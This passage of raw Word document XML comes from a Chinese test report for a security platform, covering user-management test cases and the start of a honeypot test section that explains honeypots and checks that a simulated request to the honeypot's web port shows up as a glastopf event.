          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B3A2E4E"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720F3229" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4C82E653" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B52CFBA"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12F7EE6F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="29714663" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54CADB5D"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054E5721" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="47DCE849" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79A5FCAF"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6FDBB2AB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1、停用、启用账号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A6235F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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D0CB59B" wp14:editId="0B9FB42F">
                  <wp:extent cx="4201795" cy="2243455"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="17145"/>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9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2243455"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="04BC4714" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:num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用户详情</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FF8CA7"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08D01D62" wp14:editId="3303F5D2">
                  <wp:extent cx="4201795" cy="2234565"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="635"/>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0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2234565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C3B9F5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:num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新建根目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC1DD4C"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39FA3C20" wp14:editId="4FE1725D">
                  <wp:extent cx="4201795" cy="2061845"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="20955"/>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1"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2061845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A5378A9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:num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取消根目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F48D33F"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16ED325A" wp14:editId="24B174FF">
                  <wp:extent cx="4201795" cy="2340610"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="2159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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2340610"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2F15CAB0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C80E8B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E28BB1"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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，功能测试正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D71AE35" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="720D888E"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0C3CA424" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D34D269" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="346" w:name="_Toc517255075"/>
      <w:bookmarkStart w:id="347" w:name="_Toc517280883"/>
      <w:bookmarkStart w:id="348" w:name="_Toc36487957"/>
      <w:bookmarkStart w:id="349" w:name="_Toc36573242"/>
      <w:bookmarkStart w:id="350" w:name="_Toc36630328"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>蜜罐</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>
      <w:bookmarkEnd w:id="348"/>
      <w:bookmarkEnd w:id="349"/>
      <w:bookmarkEnd w:id="350"/>
    </w:p>
    <w:p w14:paraId="4E78F7F6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="_Toc36487958"/>
      <w:bookmarkStart w:id="352" w:name="_Toc36573243"/>
      <w:bookmarkStart w:id="353" w:name="_Toc36630329"/>
      <w:r w:rsidRPr="00536672">
        <w:t>功能介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
      <w:bookmarkEnd w:id="352"/>
      <w:bookmarkEnd w:id="353"/>
    </w:p>
    <w:p w14:paraId="11CD6ED6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>蜜罐技术本质上是一种对攻击方进行欺骗的技术，通过布置一些作为诱饵的主机、网络服务或者信息，诱使攻击方对它们实施攻击，从而可以对攻击行为进行捕获和分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，能够让防御方清晰地了解他们所面对的安全威胁，并通过技术和管理手段来增强实际系统的安全防护能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599EBC68" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>蜜</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/%E7%BD%90" \t "/Users/zwj/Documents\\x/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>罐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>好比是情报收集系统。</w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
        <w:r w:rsidRPr="003914A3">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>蜜</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>罐好像是故意让人攻击的目标，引诱</w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
        <w:r w:rsidRPr="003914A3">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>黑客</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>前来攻击。所以攻击者入侵后，你就可以知道他是如何得逞的，随时了解针对服务器发动的最新的攻击和漏洞。还可以通过</w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
        <w:r w:rsidRPr="003914A3">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>窃听</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>黑客之间的联系，收集黑客所用的种种工具，并且掌握他们的社交网络。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC035E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="_Toc36487959"/>
      <w:bookmarkStart w:id="355" w:name="_Toc36573244"/>
      <w:bookmarkStart w:id="356" w:name="_Toc36630330"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="354"/>
      <w:bookmarkEnd w:id="355"/>
      <w:bookmarkEnd w:id="356"/>
    </w:p>
    <w:p w14:paraId="1379D949" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="_Toc36487960"/>
      <w:r w:rsidRPr="00536672">
        <w:t>蜜罐面板测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>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516E270A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44917879"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1BC78CB8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>蜜罐网面板测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6981B3F9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DC8D51"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6D26185E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>激活控制面板数据。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0072B5E1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE251F7"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186F49E6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="337BDDEE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB82A7E"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7342EEA0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>打开honey的</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>控制面板-仪表盘菜单</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>发现蜜</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>罐</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>服</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>务</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的事件都</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>为</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>0，没有攻</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>击</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，如下</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>图</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C96709"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46E22D5C" wp14:editId="6DF2EA47">
                  <wp:extent cx="4104005" cy="2156460"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="254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86"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2156460"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E82A84C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>请求</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nodeip:88</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>端口制造一个攻击后，发现glastopf有个事件，88正是这个模块的对外端口，如图</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="257F5842"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drawing>
